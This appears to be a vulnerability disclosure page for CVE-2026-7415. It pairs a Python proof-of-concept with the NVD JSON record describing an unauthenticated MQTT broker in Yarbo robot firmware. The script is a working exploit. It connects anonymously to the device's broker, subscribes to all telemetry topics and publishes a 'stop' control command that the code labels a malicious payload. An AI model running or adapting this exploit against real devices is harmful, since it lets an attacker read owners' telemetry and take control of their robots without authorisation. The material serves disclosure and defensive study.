CVE-2026-7415

import paho.mqtt.client as mqtt import time # Configuration TARGET_IP = "192.168.1.100" # Replace with the target Yarbo device IP PORT = 1883 CONTROL_TOPIC = "yarbo/control/move" # Example control topic TELEMETRY_TOPIC = "yarbo/telemetry/#" # Example telemetry topic # Callback when connection is established def on_connect(client, userdata, flags, rc): print(f"[+] Connected with result code {rc}") # Subscribe to sensitive telemetry topics client.subscribe(TELEMETRY_TOPIC) print(f"[+] Subscribed to: {TELEMETRY_TOPIC}") # Callback when message is received def on_message(client, userdata, msg): print(f"[+] Received message on {msg.topic}: {msg.payload.decode()}") def main(): client = mqtt.Client() client.on_connect = on_connect client.on_message = on_message try: # Connect to the broker anonymously (No username/password) print(f"[*] Attempting to connect to {TARGET_IP}:{PORT}...") client.connect(TARGET_IP, PORT, 60) # Start the loop to process network traffic client.loop_start() # Wait a bit for connection to establish time.sleep(2) # Attack: Publish a control command without authentication malicious_payload = "{\"command\": \"stop\", \"reason\": \"attack\"}" print(f"[*] Sending malicious payload to {CONTROL_TOPIC}: {malicious_payload}") client.publish(CONTROL_TOPIC, malicious_payload) # Keep listening for a few seconds time.sleep(5) except Exception as e: print(f"[-] Error: {e}") finally: client.loop_stop() client.disconnect() print("[*] Disconnected.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-7415", "sourceIdentifier": "[email protected]", "published": "2026-05-07T17:15:59.570", "lastModified": "2026-05-07T18:46:25.867", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MQTT broker embedded in Yarbo firmware v2.3.9 is configured to allow anonymous connections with no topic-level read or write ACLs. Any host on the same network can subscribe to sensitive telemetry topics or publish control messages directly to the robot without authentication or authorization of any kind."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/Bin4ry/yarbo-nat-in-my-back-yard", "source": "[email protected]"}, {"url": "https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000000111111111100111111111110000000000000000000000000000000000000000000000000000001001", "source": "[email protected]"}, {"url": "https://github.com/Bin4ry/yarbo-nat-in-my-back-yard", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}